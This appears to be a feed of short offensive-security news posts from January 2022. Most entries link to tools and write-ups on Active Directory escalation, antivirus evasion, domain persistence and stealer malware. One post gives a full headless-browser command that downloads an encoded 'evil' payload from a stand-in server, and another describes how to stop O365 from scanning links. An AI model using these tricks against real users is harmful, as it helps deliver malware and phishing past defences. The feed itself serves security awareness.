■■■■□ Tool: BloodyAD, an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py. https://github.com/CravateRouge/bloodyAD https://t.me/cKure/10504
All posts tagged hack
January 6, 2022 at 05:06PM
■■■■□ Bluffy: Bypass Anti-Virus products by formatting shellcode into realistic looking data formats. https://securityonline.info/bluffy-bypass-anti-virus-formatting-shellcode/ https://t.me/cKure/10503
January 6, 2022 at 10:06AM
■■□□□ A very user friendly writeup of HackTheBox machine. https://msameer234.github.io/2019/10/09/HackTheBox-SwagShop-Walkthrough.html https://t.me/cKure/10501
January 6, 2022 at 12:19AM
● Yet another website: tools.epieos.com/skype.php https://t.me/cKure/10500
January 6, 2022 at 12:09AM
■□□□□ Guide on Offensive Operations for Companies. https://xorl.wordpress.com/2021/12/28/guide-on-offensive-operations-for-companies/ https://t.me/cKure/10499
January 5, 2022 at 09:01PM
■■■□□ NOTFLIX: A tool which searches magnet links and stream it with webtorrent. https://github.com/Bugswriter/notflix https://t.me/cKure/10498
January 5, 2022 at 09:01PM
■■□□□ Domain Persistence – AdminSDHolder https://pentestlab.blog/2022/01/04/domain-persistence-adminsdholder https://t.me/cKure/10497
January 5, 2022 at 07:40PM
■■□□□ Stealer Malware Intelligence Report – Oman 615 of Omani users has been infected with Stealer (Redline, Raccoon, Vidar, etc). 2,567 of credentials that access to .om domains are leaked from the users and are distributed on Dark and Deep Web. https://t.me/cKure/10496
January 5, 2022 at 01:56PM
■■■■□ Another way to download files using msedge/chrome: [msedge.exe | chrome.exe] –headless –enable-logging –disable-gpu –dump-dom “http://server/evil.b64.html” > out.b64 – Downloaded file should end with .html. – Binaries should be encoded. https://twitter.com/mrd0x/status/1478234484881436672 https://t.me/cKure/10494
January 5, 2022 at 12:22AM
■■■□□ Interesting thread! If you compose an email using the “Reply” function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won’t scan the link anymore. click ==> junk click ==> inbox https://twitter.com/mrd0x/status/1475177065204834311 https://t.me/cKure/10493
